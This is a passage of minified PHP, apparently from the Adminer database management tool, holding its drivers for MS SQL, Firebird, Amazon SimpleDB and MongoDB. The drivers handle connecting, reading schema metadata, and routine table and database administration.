connect($N,$V,$G){$this->_link=@mssql_connect($N,$V,$G);if($this->_link){$I=$this->query("SELECT SERVERPROPERTY('ProductLevel'), SERVERPROPERTY('Edition')");$K=$I->fetch_row();$this->server_info=$this->result("sp_server_info 2",2)." [$K[0]] $K[1]";}else$this->error=mssql_get_last_message();return(bool)$this->_link;}function
quote($Q){return"'".str_replace("'","''",$Q)."'";}function
select_db($k){return
mssql_select_db($k);}function
query($H,$Sh=false){$I=@mssql_query($H,$this->_link);$this->error="";if(!$I){$this->error=mssql_get_last_message();return
false;}if($I===true){$this->affected_rows=mssql_rows_affected($this->_link);return
true;}return
new
Min_Result($I);}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
mssql_next_result($this->_result->_result);}function
result($H,$o=0){$I=$this->query($H);if(!is_object($I))return
false;return
mssql_result($I->_result,0,$o);}}class
Min_Result{var$_result,$_offset=0,$_fields,$num_rows;function
__construct($I){$this->_result=$I;$this->num_rows=mssql_num_rows($I);}function
fetch_assoc(){return
mssql_fetch_assoc($this->_result);}function
fetch_row(){return
mssql_fetch_row($this->_result);}function
num_rows(){return
mssql_num_rows($this->_result);}function
fetch_field(){$J=mssql_fetch_field($this->_result);$J->orgtable=$J->table;$J->orgname=$J->name;return$J;}function
seek($D){mssql_data_seek($this->_result,$D);}function
__destruct(){mssql_free_result($this->_result);}}}elseif(extension_loaded("pdo_dblib")){class
Min_DB
extends
Min_PDO{var$extension="PDO_DBLIB";function
connect($N,$V,$G){$this->dsn("dblib:charset=utf8;host=".str_replace(":",";unix_socket=",preg_replace('~:(\\d)~',';port=\\1',$N)),$V,$G);return
true;}function
select_db($k){return$this->query("USE ".idf_escape($k));}}}class
Min_Driver
extends
Min_SQL{function
insertUpdate($R,$L,$Kf){foreach($L
as$O){$Zh=array();$Z=array();foreach($O
as$y=>$X){$Zh[]="$y = $X";if(isset($Kf[idf_unescape($y)]))$Z[]="$y = $X";}if(!queries("MERGE ".table($R)." USING (VALUES(".implode(", ",$O).")) AS source (c".implode(", c",range(1,count($O))).") ON ".implode(" AND ",$Z)." WHEN MATCHED THEN UPDATE SET ".implode(", ",$Zh)." WHEN NOT MATCHED THEN INSERT (".implode(", ",array_keys($O)).") VALUES (".implode(", ",$O).");"))return
false;}return
true;}function
begin(){return
queries("BEGIN TRANSACTION");}}function
idf_escape($u){return"[".str_replace("]","]]",$u)."]";}function
table($u){return($_GET["ns"]!=""?idf_escape($_GET["ns"]).".":"").idf_escape($u);}function
connect(){global$b;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2]))return$g;return$g->error;}function
get_databases(){return
get_vals("SELECT name FROM sys.databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb')");}function
limit($H,$Z,$z,$D=0,$Dg=" "){return($z!==null?" TOP (".($z+$D).")":"")." $H$Z";}function
limit1($H,$Z){return
limit($H,$Z,1);}function
db_collation($m,$ob){global$g;return$g->result("SELECT collation_name FROM sys.databases WHERE name = ".q($m));}function
engines(){return
array();}function
logged_user(){global$g;return$g->result("SELECT SUSER_NAME()");}function
tables_list(){return
get_key_vals("SELECT name, type_desc FROM sys.all_objects WHERE schema_id = SCHEMA_ID(".q(get_schema()).") AND type IN ('S', 'U', 'V') ORDER BY name");}function
count_tables($l){global$g;$J=array();foreach($l
as$m){$g->select_db($m);$J[$m]=$g->result("SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES");}return$J;}function
table_status($C=""){$J=array();foreach(get_rows("SELECT name AS Name, type_desc AS Engine FROM sys.all_objects WHERE schema_id = SCHEMA_ID(".q(get_schema()).") AND type IN ('S', 'U', 'V') ".($C!=""?"AND name = ".q($C):"ORDER BY name"))as$K){if($C!="")return$K;$J[$K["Name"]]=$K;}return$J;}function
is_view($S){return$S["Engine"]=="VIEW";}function
fk_support($S){return
true;}function
fields($R){$J=array();foreach(get_rows("SELECT c.*, t.name type, d.definition [default]
FROM sys.all_columns c
JOIN sys.all_objects o ON c.object_id = o.object_id
JOIN sys.types t ON c.user_type_id = t.user_type_id
LEFT JOIN sys.default_constraints d ON c.default_object_id = d.parent_column_id
WHERE o.schema_id = SCHEMA_ID(".q(get_schema()).") AND o.type IN ('S', 'U', 'V') AND o.name = ".q($R))as$K){$U=$K["type"];$be=(preg_match("~char|binary~",$U)?$K["max_length"]:($U=="decimal"?"$K[precision],$K[scale]":""));$J[$K["name"]]=array("field"=>$K["name"],"full_type"=>$U.($be?"($be)":""),"type"=>$U,"length"=>$be,"default"=>$K["default"],"null"=>$K["is_nullable"],"auto_increment"=>$K["is_identity"],"collation"=>$K["collation_name"],"privileges"=>array("insert"=>1,"select"=>1,"update"=>1),"primary"=>$K["is_identity"],);}return$J;}function
indexes($R,$h=null){$J=array();foreach(get_rows("SELECT i.name, key_ordinal, is_unique, is_primary_key, c.name AS column_name, is_descending_key
FROM sys.indexes i
INNER JOIN sys.index_columns ic ON i.object_id = ic.object_id AND i.index_id = ic.index_id
INNER JOIN sys.columns c ON ic.object_id = c.object_id AND ic.column_id = c.column_id
WHERE OBJECT_NAME(i.object_id) = ".q($R),$h)as$K){$C=$K["name"];$J[$C]["type"]=($K["is_primary_key"]?"PRIMARY":($K["is_unique"]?"UNIQUE":"INDEX"));$J[$C]["lengths"]=array();$J[$C]["columns"][$K["key_ordinal"]]=$K["column_name"];$J[$C]["descs"][$K["key_ordinal"]]=($K["is_descending_key"]?'1':null);}return$J;}function
view($C){global$g;return
array("select"=>preg_replace('~^(?:[^[]|\\[[^]]*])*\\s+AS\\s+~isU','',$g->result("SELECT VIEW_DEFINITION FROM INFORMATION_SCHEMA.VIEWS WHERE TABLE_SCHEMA = SCHEMA_NAME() AND TABLE_NAME = ".q($C))));}function
collations(){$J=array();foreach(get_vals("SELECT name FROM fn_helpcollations()")as$nb)$J[preg_replace('~_.*~','',$nb)][]=$nb;return$J;}function
information_schema($m){return
false;}function
error(){global$g;return
nl_br(h(preg_replace('~^(\\[[^]]*])+~m','',$g->error)));}function
create_database($m,$nb){return
queries("CREATE DATABASE ".idf_escape($m).(preg_match('~^[a-z0-9_]+$~i',$nb)?" COLLATE $nb":""));}function
drop_databases($l){return
queries("DROP DATABASE ".implode(", ",array_map('idf_escape',$l)));}function
rename_database($C,$nb){if(preg_match('~^[a-z0-9_]+$~i',$nb))queries("ALTER DATABASE ".idf_escape(DB)." COLLATE $nb");queries("ALTER DATABASE ".idf_escape(DB)." MODIFY NAME = ".idf_escape($C));return
true;}function
auto_increment(){return" IDENTITY".($_POST["Auto_increment"]!=""?"(".number($_POST["Auto_increment"]).",1)":"")." PRIMARY KEY";}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){$c=array();foreach($p
as$o){$d=idf_escape($o[0]);$X=$o[1];if(!$X)$c["DROP"][]=" COLUMN $d";else{$X[1]=preg_replace("~( COLLATE )'(\\w+)'~","\\1\\2",$X[1]);if($o[0]=="")$c["ADD"][]="\n ".implode("",$X).($R==""?substr($Rc[$X[0]],16+strlen($X[0])):"");else{unset($X[6]);if($d!=$X[0])queries("EXEC sp_rename ".q(table($R).".$d").", ".q(idf_unescape($X[0])).", 'COLUMN'");$c["ALTER COLUMN ".implode("",$X)][]="";}}}if($R=="")return
queries("CREATE TABLE ".table($C)." (".implode(",",(array)$c["ADD"])."\n)");if($R!=$C)queries("EXEC sp_rename ".q(table($R)).", ".q($C));if($Rc)$c[""]=$Rc;foreach($c
as$y=>$X){if(!queries("ALTER TABLE ".idf_escape($C)." $y".implode(",",$X)))return
false;}return
true;}function
alter_indexes($R,$c){$v=array();$Zb=array();foreach($c
as$X){if($X[2]=="DROP"){if($X[0]=="PRIMARY")$Zb[]=idf_escape($X[1]);else$v[]=idf_escape($X[1])." ON ".table($R);}elseif(!queries(($X[0]!="PRIMARY"?"CREATE $X[0] ".($X[0]!="INDEX"?"INDEX ":"").idf_escape($X[1]!=""?$X[1]:uniqid($R."_"))." ON ".table($R):"ALTER TABLE ".table($R)." ADD PRIMARY KEY")." (".implode(", ",$X[2]).")"))return
false;}return(!$v||queries("DROP INDEX ".implode(", ",$v)))&&(!$Zb||queries("ALTER TABLE ".table($R)." DROP ".implode(", ",$Zb)));}function
last_id(){global$g;return$g->result("SELECT SCOPE_IDENTITY()");}function
explain($g,$H){$g->query("SET SHOWPLAN_ALL ON");$J=$g->query($H);$g->query("SET SHOWPLAN_ALL OFF");return$J;}function
found_rows($S,$Z){}function
foreign_keys($R){$J=array();foreach(get_rows("EXEC sp_fkeys @fktable_name = ".q($R))as$K){$q=&$J[$K["FK_NAME"]];$q["table"]=$K["PKTABLE_NAME"];$q["source"][]=$K["FKCOLUMN_NAME"];$q["target"][]=$K["PKCOLUMN_NAME"];}return$J;}function
truncate_tables($T){return
apply_queries("TRUNCATE TABLE",$T);}function
drop_views($oi){return
queries("DROP VIEW ".implode(", ",array_map('table',$oi)));}function
drop_tables($T){return
queries("DROP TABLE ".implode(", ",array_map('table',$T)));}function
move_tables($T,$oi,$oh){return
apply_queries("ALTER SCHEMA ".idf_escape($oh)." TRANSFER",array_merge($T,$oi));}function
trigger($C){if($C=="")return
array();$L=get_rows("SELECT s.name [Trigger],
CASE WHEN OBJECTPROPERTY(s.id, 'ExecIsInsertTrigger') = 1 THEN 'INSERT' WHEN OBJECTPROPERTY(s.id, 'ExecIsUpdateTrigger') = 1 THEN 'UPDATE' WHEN OBJECTPROPERTY(s.id, 'ExecIsDeleteTrigger') = 1 THEN 'DELETE' END [Event],
CASE WHEN OBJECTPROPERTY(s.id, 'ExecIsInsteadOfTrigger') = 1 THEN 'INSTEAD OF' ELSE 'AFTER' END [Timing],
c.text
FROM sysobjects s
JOIN syscomments c ON s.id = c.id
WHERE s.xtype = 'TR' AND s.name = ".q($C));$J=reset($L);if($J)$J["Statement"]=preg_replace('~^.+\\s+AS\\s+~isU','',$J["text"]);return$J;}function
triggers($R){$J=array();foreach(get_rows("SELECT sys1.name,
CASE WHEN OBJECTPROPERTY(sys1.id, 'ExecIsInsertTrigger') = 1 THEN 'INSERT' WHEN OBJECTPROPERTY(sys1.id, 'ExecIsUpdateTrigger') = 1 THEN 'UPDATE' WHEN OBJECTPROPERTY(sys1.id, 'ExecIsDeleteTrigger') = 1 THEN 'DELETE' END [Event],
CASE WHEN OBJECTPROPERTY(sys1.id, 'ExecIsInsteadOfTrigger') = 1 THEN 'INSTEAD OF' ELSE 'AFTER' END [Timing]
FROM sysobjects sys1
JOIN sysobjects sys2 ON sys1.parent_obj = sys2.id
WHERE sys1.xtype = 'TR' AND sys2.name = ".q($R))as$K)$J[$K["name"]]=array($K["Timing"],$K["Event"]);return$J;}function
trigger_options(){return
array("Timing"=>array("AFTER","INSTEAD OF"),"Event"=>array("INSERT","UPDATE","DELETE"),"Type"=>array("AS"),);}function
schemas(){return
get_vals("SELECT name FROM sys.schemas");}function
get_schema(){global$g;if($_GET["ns"]!="")return$_GET["ns"];return$g->result("SELECT SCHEMA_NAME()");}function
set_schema($xg){return
true;}function
use_sql($k){return"USE ".idf_escape($k);}function
show_variables(){return
array();}function
show_status(){return
array();}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
support($Gc){return
preg_match('~^(columns|database|drop_col|indexes|scheme|sql|table|trigger|view|view_trigger)$~',$Gc);}$x="mssql";$Rh=array();$Yg=array();foreach(array(lang(25)=>array("tinyint"=>3,"smallint"=>5,"int"=>10,"bigint"=>20,"bit"=>1,"decimal"=>0,"real"=>12,"float"=>53,"smallmoney"=>10,"money"=>20),lang(26)=>array("date"=>10,"smalldatetime"=>19,"datetime"=>19,"datetime2"=>19,"time"=>8,"datetimeoffset"=>10),lang(23)=>array("char"=>8000,"varchar"=>8000,"text"=>2147483647,"nchar"=>4000,"nvarchar"=>4000,"ntext"=>1073741823),lang(27)=>array("binary"=>8000,"varbinary"=>8000,"image"=>2147483647),)as$y=>$X){$Rh+=$X;$Yg[$y]=array_keys($X);}$Yh=array();$Ye=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","IN","IS NULL","NOT LIKE","NOT IN","IS NOT NULL");$Zc=array("len","lower","round","upper");$ed=array("avg","count","count distinct","max","min","sum");$gc=array(array("date|time"=>"getdate",),array("int|decimal|real|float|money|datetime"=>"+/-","char|text"=>"+",));}$Yb['firebird']='Firebird (alpha)';if(isset($_GET["firebird"])){$Hf=array("interbase");define("DRIVER","firebird");if(extension_loaded("interbase")){class
Min_DB{var$extension="Firebird",$server_info,$affected_rows,$errno,$error,$_link,$_result;function
connect($N,$V,$G){$this->_link=ibase_connect($N,$V,$G);if($this->_link){$bi=explode(':',$N);$this->service_link=ibase_service_attach($bi[0],$V,$G);$this->server_info=ibase_server_info($this->service_link,IBASE_SVC_SERVER_VERSION);}else{$this->errno=ibase_errcode();$this->error=ibase_errmsg();}return(bool)$this->_link;}function
quote($Q){return"'".str_replace("'","''",$Q)."'";}function
select_db($k){return($k=="domain");}function
query($H,$Sh=false){$I=ibase_query($H,$this->_link);if(!$I){$this->errno=ibase_errcode();$this->error=ibase_errmsg();return
false;}$this->error="";if($I===true){$this->affected_rows=ibase_affected_rows($this->_link);return
true;}return
new
Min_Result($I);}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
false;}function
result($H,$o=0){$I=$this->query($H);if(!$I||!$I->num_rows)return
false;$K=$I->fetch_row();return$K[$o];}}class
Min_Result{var$num_rows,$_result,$_offset=0;function
__construct($I){$this->_result=$I;}function
fetch_assoc(){return
ibase_fetch_assoc($this->_result);}function
fetch_row(){return
ibase_fetch_row($this->_result);}function
fetch_field(){$o=ibase_field_info($this->_result,$this->_offset++);return(object)array('name'=>$o['name'],'orgname'=>$o['name'],'type'=>$o['type'],'charsetnr'=>$o['length'],);}function
__destruct(){ibase_free_result($this->_result);}}}class
Min_Driver
extends
Min_SQL{}function
idf_escape($u){return'"'.str_replace('"','""',$u).'"';}function
table($u){return
idf_escape($u);}function
connect(){global$b;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2]))return$g;return$g->error;}function
get_databases($Qc){return
array("domain");}function
limit($H,$Z,$z,$D=0,$Dg=" "){$J='';$J.=($z!==null?$Dg."FIRST $z".($D?" SKIP $D":""):"");$J.=" $H$Z";return$J;}function
limit1($H,$Z){return
limit($H,$Z,1);}function
db_collation($m,$ob){}function
engines(){return
array();}function
logged_user(){global$b;$j=$b->credentials();return$j[1];}function
tables_list(){global$g;$H='SELECT RDB$RELATION_NAME FROM rdb$relations WHERE rdb$system_flag = 0';$I=ibase_query($g->_link,$H);$J=array();while($K=ibase_fetch_assoc($I))$J[$K['RDB$RELATION_NAME']]='table';ksort($J);return$J;}function
count_tables($l){return
array();}function
table_status($C="",$Fc=false){global$g;$J=array();$Gb=tables_list();foreach($Gb
as$v=>$X){$v=trim($v);$J[$v]=array('Name'=>$v,'Engine'=>'standard',);if($C==$v)return$J[$v];}return$J;}function
is_view($S){return
false;}function
fk_support($S){return
preg_match('~InnoDB|IBMDB2I~i',$S["Engine"]);}function
fields($R){global$g;$J=array();$H='SELECT r.RDB$FIELD_NAME AS field_name,
r.RDB$DESCRIPTION AS field_description,
r.RDB$DEFAULT_VALUE AS field_default_value,
r.RDB$NULL_FLAG AS field_not_null_constraint,
f.RDB$FIELD_LENGTH AS field_length,
f.RDB$FIELD_PRECISION AS field_precision,
f.RDB$FIELD_SCALE AS field_scale,
CASE f.RDB$FIELD_TYPE
WHEN 261 THEN \'BLOB\'
WHEN 14 THEN \'CHAR\'
WHEN 40 THEN \'CSTRING\'
WHEN 11 THEN \'D_FLOAT\'
WHEN 27 THEN \'DOUBLE\'
WHEN 10 THEN \'FLOAT\'
WHEN 16 THEN \'INT64\'
WHEN 8 THEN \'INTEGER\'
WHEN 9 THEN \'QUAD\'
WHEN 7 THEN \'SMALLINT\'
WHEN 12 THEN \'DATE\'
WHEN 13 THEN \'TIME\'
WHEN 35 THEN \'TIMESTAMP\'
WHEN 37 THEN \'VARCHAR\'
ELSE \'UNKNOWN\'
END AS field_type,
f.RDB$FIELD_SUB_TYPE AS field_subtype,
coll.RDB$COLLATION_NAME AS field_collation,
cset.RDB$CHARACTER_SET_NAME AS field_charset
FROM RDB$RELATION_FIELDS r
LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME
LEFT JOIN RDB$COLLATIONS coll ON f.RDB$COLLATION_ID = coll.RDB$COLLATION_ID
LEFT JOIN RDB$CHARACTER_SETS cset ON f.RDB$CHARACTER_SET_ID = cset.RDB$CHARACTER_SET_ID
WHERE r.RDB$RELATION_NAME = '.q($R).'
ORDER BY r.RDB$FIELD_POSITION';$I=ibase_query($g->_link,$H);while($K=ibase_fetch_assoc($I))$J[trim($K['FIELD_NAME'])]=array("field"=>trim($K["FIELD_NAME"]),"full_type"=>trim($K["FIELD_TYPE"]),"type"=>trim($K["FIELD_SUB_TYPE"]),"default"=>trim($K['FIELD_DEFAULT_VALUE']),"null"=>(trim($K["FIELD_NOT_NULL_CONSTRAINT"])=="YES"),"auto_increment"=>'0',"collation"=>trim($K["FIELD_COLLATION"]),"privileges"=>array("insert"=>1,"select"=>1,"update"=>1),"comment"=>trim($K["FIELD_DESCRIPTION"]),);return$J;}function
indexes($R,$h=null){$J=array();return$J;}function
foreign_keys($R){return
array();}function
collations(){return
array();}function
information_schema($m){return
false;}function
error(){global$g;return
h($g->error);}function
types(){return
array();}function
schemas(){return
array();}function
get_schema(){return"";}function
set_schema($xg){return
true;}function
support($Gc){return
preg_match("~^(columns|sql|status|table)$~",$Gc);}$x="firebird";$Ye=array("=");$Zc=array();$ed=array();$gc=array();}$Yb["simpledb"]="SimpleDB";if(isset($_GET["simpledb"])){$Hf=array("SimpleXML");define("DRIVER","simpledb");if(class_exists('SimpleXMLElement')){class
Min_DB{var$extension="SimpleXML",$server_info='2009-04-15',$error,$timeout,$next,$affected_rows,$_result;function
select_db($k){return($k=="domain");}function
query($H,$Sh=false){$F=array('SelectExpression'=>$H,'ConsistentRead'=>'true');if($this->next)$F['NextToken']=$this->next;$I=sdb_request_all('Select','Item',$F,$this->timeout);if($I===false)return$I;if(preg_match('~^\s*SELECT\s+COUNT\(~i',$H)){$ch=0;foreach($I
as$Id)$ch+=$Id->Attribute->Value;$I=array((object)array('Attribute'=>array((object)array('Name'=>'Count','Value'=>$ch,))));}return
new
Min_Result($I);}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
false;}function
quote($Q){return"'".str_replace("'","''",$Q)."'";}}class
Min_Result{var$num_rows,$_rows=array(),$_offset=0;function
__construct($I){foreach($I
as$Id){$K=array();if($Id->Name!='')$K['itemName()']=(string)$Id->Name;foreach($Id->Attribute
as$Ia){$C=$this->_processValue($Ia->Name);$Y=$this->_processValue($Ia->Value);if(isset($K[$C])){$K[$C]=(array)$K[$C];$K[$C][]=$Y;}else$K[$C]=$Y;}$this->_rows[]=$K;foreach($K
as$y=>$X){if(!isset($this->_rows[0][$y]))$this->_rows[0][$y]=null;}}$this->num_rows=count($this->_rows);}function
_processValue($jc){return(is_object($jc)&&$jc['encoding']=='base64'?base64_decode($jc):(string)$jc);}function
fetch_assoc(){$K=current($this->_rows);if(!$K)return$K;$J=array();foreach($this->_rows[0]as$y=>$X)$J[$y]=$K[$y];next($this->_rows);return$J;}function
fetch_row(){$J=$this->fetch_assoc();if(!$J)return$J;return
array_values($J);}function
fetch_field(){$Od=array_keys($this->_rows[0]);return(object)array('name'=>$Od[$this->_offset++]);}}}class
Min_Driver
extends
Min_SQL{public$Kf="itemName()";function
_chunkRequest($pd,$va,$F,$zc=array()){global$g;foreach(array_chunk($pd,25)as$gb){$rf=$F;foreach($gb
as$s=>$t){$rf["Item.$s.ItemName"]=$t;foreach($zc
as$y=>$X)$rf["Item.$s.$y"]=$X;}if(!sdb_request($va,$rf))return
false;}$g->affected_rows=count($pd);return
true;}function
_extractIds($R,$Vf,$z){$J=array();if(preg_match_all("~itemName\(\) = (('[^']*+')+)~",$Vf,$ke))$J=array_map('idf_unescape',$ke[1]);else{foreach(sdb_request_all('Select','Item',array('SelectExpression'=>'SELECT itemName() FROM '.table($R).$Vf.($z?" LIMIT 1":"")))as$Id)$J[]=$Id->Name;}return$J;}function
select($R,$M,$Z,$cd,$df=array(),$z=1,$E=0,$Mf=false){global$g;$g->next=$_GET["next"];$J=parent::select($R,$M,$Z,$cd,$df,$z,$E,$Mf);$g->next=0;return$J;}function
delete($R,$Vf,$z=0){return$this->_chunkRequest($this->_extractIds($R,$Vf,$z),'BatchDeleteAttributes',array('DomainName'=>$R));}function
update($R,$O,$Vf,$z=0,$Dg="\n"){$Nb=array();$_d=array();$s=0;$pd=$this->_extractIds($R,$Vf,$z);$t=idf_unescape($O["`itemName()`"]);unset($O["`itemName()`"]);foreach($O
as$y=>$X){$y=idf_unescape($y);if($X=="NULL"||($t!=""&&array($t)!=$pd))$Nb["Attribute.".count($Nb).".Name"]=$y;if($X!="NULL"){foreach((array)$X
as$Kd=>$W){$_d["Attribute.$s.Name"]=$y;$_d["Attribute.$s.Value"]=(is_array($X)?$W:idf_unescape($W));if(!$Kd)$_d["Attribute.$s.Replace"]="true";$s++;}}}$F=array('DomainName'=>$R);return(!$_d||$this->_chunkRequest(($t!=""?array($t):$pd),'BatchPutAttributes',$F,$_d))&&(!$Nb||$this->_chunkRequest($pd,'BatchDeleteAttributes',$F,$Nb));}function
insert($R,$O){$F=array("DomainName"=>$R);$s=0;foreach($O
as$C=>$Y){if($Y!="NULL"){$C=idf_unescape($C);if($C=="itemName()")$F["ItemName"]=idf_unescape($Y);else{foreach((array)$Y
as$X){$F["Attribute.$s.Name"]=$C;$F["Attribute.$s.Value"]=(is_array($Y)?$X:idf_unescape($Y));$s++;}}}}return
sdb_request('PutAttributes',$F);}function
insertUpdate($R,$L,$Kf){foreach($L
as$O){if(!$this->update($R,$O,"WHERE `itemName()` = ".q($O["`itemName()`"])))return
false;}return
true;}function
begin(){return
false;}function
commit(){return
false;}function
rollback(){return
false;}}function
connect(){return
new
Min_DB;}function
support($Gc){return
preg_match('~sql~',$Gc);}function
logged_user(){global$b;$j=$b->credentials();return$j[1];}function
get_databases(){return
array("domain");}function
collations(){return
array();}function
db_collation($m,$ob){}function
tables_list(){global$g;$J=array();foreach(sdb_request_all('ListDomains','DomainName')as$R)$J[(string)$R]='table';if($g->error&&defined("PAGE_HEADER"))echo"<p class='error'>".error()."\n";return$J;}function
table_status($C="",$Fc=false){$J=array();foreach(($C!=""?array($C=>true):tables_list())as$R=>$U){$K=array("Name"=>$R,"Auto_increment"=>"");if(!$Fc){$xe=sdb_request('DomainMetadata',array('DomainName'=>$R));if($xe){foreach(array("Rows"=>"ItemCount","Data_length"=>"ItemNamesSizeBytes","Index_length"=>"AttributeValuesSizeBytes","Data_free"=>"AttributeNamesSizeBytes",)as$y=>$X)$K[$y]=(string)$xe->$X;}}if($C!="")return$K;$J[$R]=$K;}return$J;}function
explain($g,$H){}function
error(){global$g;return
h($g->error);}function
information_schema(){}function
is_view($S){}function
indexes($R,$h=null){return
array(array("type"=>"PRIMARY","columns"=>array("itemName()")),);}function
fields($R){return
fields_from_edit();}function
foreign_keys($R){return
array();}function
table($u){return
idf_escape($u);}function
idf_escape($u){return"`".str_replace("`","``",$u)."`";}function
limit($H,$Z,$z,$D=0,$Dg=" "){return" $H$Z".($z!==null?$Dg."LIMIT $z":"");}function
unconvert_field($o,$J){return$J;}function
fk_support($S){}function
engines(){return
array();}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){return($R==""&&sdb_request('CreateDomain',array('DomainName'=>$C)));}function
drop_tables($T){foreach($T
as$R){if(!sdb_request('DeleteDomain',array('DomainName'=>$R)))return
false;}return
true;}function
count_tables($l){foreach($l
as$m)return
array($m=>count(tables_list()));}function
found_rows($S,$Z){return($Z?null:$S["Rows"]);}function
last_id(){}function
hmac($Ba,$Gb,$y,$Zf=false){$Ua=64;if(strlen($y)>$Ua)$y=pack("H*",$Ba($y));$y=str_pad($y,$Ua,"\0");$Ld=$y^str_repeat("\x36",$Ua);$Md=$y^str_repeat("\x5C",$Ua);$J=$Ba($Md.pack("H*",$Ba($Ld.$Gb)));if($Zf)$J=pack("H*",$J);return$J;}function
sdb_request($va,$F=array()){global$b,$g;list($md,$F['AWSAccessKeyId'],$_g)=$b->credentials();$F['Action']=$va;$F['Timestamp']=gmdate('Y-m-d\TH:i:s+00:00');$F['Version']='2009-04-15';$F['SignatureVersion']=2;$F['SignatureMethod']='HmacSHA1';ksort($F);$H='';foreach($F
as$y=>$X)$H.='&'.rawurlencode($y).'='.rawurlencode($X);$H=str_replace('%7E','~',substr($H,1));$H.="&Signature=".urlencode(base64_encode(hmac('sha1',"POST\n".preg_replace('~^https?://~','',$md)."\n/\n$H",$_g,true)));@ini_set('track_errors',1);$Jc=@file_get_contents((preg_match('~^https?://~',$md)?$md:"http://$md"),false,stream_context_create(array('http'=>array('method'=>'POST','content'=>$H,'ignore_errors'=>1,))));if(!$Jc){$g->error=$php_errormsg;return
false;}libxml_use_internal_errors(true);$ui=simplexml_load_string($Jc);if(!$ui){$n=libxml_get_last_error();$g->error=$n->message;return
false;}if($ui->Errors){$n=$ui->Errors->Error;$g->error="$n->Message ($n->Code)";return
false;}$g->error='';$nh=$va."Result";return($ui->$nh?$ui->$nh:true);}function
sdb_request_all($va,$nh,$F=array(),$wh=0){$J=array();$Vg=($wh?microtime(true):0);$z=(preg_match('~LIMIT\s+(\d+)\s*$~i',$F['SelectExpression'],$B)?$B[1]:0);do{$ui=sdb_request($va,$F);if(!$ui)break;foreach($ui->$nh
as$jc)$J[]=$jc;if($z&&count($J)>=$z){$_GET["next"]=$ui->NextToken;break;}if($wh&µtime(true)-$Vg>$wh)return
false;$F['NextToken']=$ui->NextToken;if($z)$F['SelectExpression']=preg_replace('~\d+\s*$~',$z-count($J),$F['SelectExpression']);}while($ui->NextToken);return$J;}$x="simpledb";$Ye=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","IN","IS NULL","NOT LIKE","IS NOT NULL");$Zc=array();$ed=array("count");$gc=array(array("json"));}$Yb["mongo"]="MongoDB (beta)";if(isset($_GET["mongo"])){$Hf=array("mongo");define("DRIVER","mongo");if(class_exists('MongoDB')){class
Min_DB{var$extension="Mongo",$error,$last_id,$_link,$_db;function
connect($N,$V,$G){global$b;$m=$b->database();$bf=array();if($V!=""){$bf["username"]=$V;$bf["password"]=$G;}if($m!="")$bf["db"]=$m;try{$this->_link=@new
MongoClient("mongodb://$N",$bf);return
true;}catch(Exception$vc){$this->error=$vc->getMessage();return
false;}}function
query($H){return
false;}function
select_db($k){try{$this->_db=$this->_link->selectDB($k);return
true;}catch(Exception$vc){$this->error=$vc->getMessage();return
false;}}function
quote($Q){return$Q;}}class
Min_Result{var$num_rows,$_rows=array(),$_offset=0,$_charset=array();function
__construct($I){foreach($I
as$Id){$K=array();foreach($Id
as$y=>$X){if(is_a($X,'MongoBinData'))$this->_charset[$y]=63;$K[$y]=(is_a($X,'MongoId')?'ObjectId("'.strval($X).'")':(is_a($X,'MongoDate')?gmdate("Y-m-d H:i:s",$X->sec)." GMT":(is_a($X,'MongoBinData')?$X->bin:(is_a($X,'MongoRegex')?strval($X):(is_object($X)?get_class($X):$X)))));}$this->_rows[]=$K;foreach($K
as$y=>$X){if(!isset($this->_rows[0][$y]))$this->_rows[0][$y]=null;}}$this->num_rows=count($this->_rows);}function
fetch_assoc(){$K=current($this->_rows);if(!$K)return$K;$J=array();foreach($this->_rows[0]as$y=>$X)$J[$y]=$K[$y];next($this->_rows);return$J;}function
fetch_row(){$J=$this->fetch_assoc();if(!$J)return$J;return
array_values($J);}function
fetch_field(){$Od=array_keys($this->_rows[0]);$C=$Od[$this->_offset++];return(object)array('name'=>$C,'charsetnr'=>$this->_charset[$C],);}}}class
Min_Driver
extends
Min_SQL{public$Kf="_id";function
select($R,$M,$Z,$cd,$df=array(),$z=1,$E=0,$Mf=false){$M=($M==array("*")?array():array_fill_keys($M,true));$Pg=array();foreach($df
as$X){$X=preg_replace('~ DESC$~','',$X,1,$Bb);$Pg[$X]=($Bb?-1:1);}return
new
Min_Result($this->_conn->_db->selectCollection($R)->find(array(),$M)->sort($Pg)->limit(+$z)->skip($E*$z));}function
insert($R,$O){try{$J=$this->_conn->_db->selectCollection($R)->insert($O);$this->_conn->errno=$J['code'];$this->_conn->error=$J['err'];$this->_conn->last_id=$O['_id'];return!$J['err'];}catch(Exception$vc){$this->_conn->error=$vc->getMessage();return
false;}}}function
connect(){global$b;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2]))return$g;return$g->error;}function
error(){global$g;return
h($g->error);}function
logged_user(){global$b;$j=$b->credentials();return$j[1];}function
get_databases($Qc){global$g;$J=array();$Kb=$g->_link->listDBs();foreach($Kb['databases']as$m)$J[]=$m['name'];return$J;}function
collations(){return
array();}function
db_collation($m,$ob){}function
count_tables($l){global$g;$J=array();foreach($l
as$m)$J[$m]=count($g->_link->selectDB($m)->getCollectionNames(true));return$J;}function
tables_list(){global$g;return
array_fill_keys($g->_db->getCollectionNames(true),'table');}function
table_status($C="",$Fc=false){$J=array();foreach(tables_list()as$R=>$U){$J[$R]=array("Name"=>$R);if($C==$R)return$J[$R];}return$J;}function
information_schema(){}function
is_view($S){}function
drop_databases($l){global$g;foreach($l
as$m){$kg=$g->_link->selectDB($m)->drop();if(!$kg['ok'])return
false;}return
true;}function
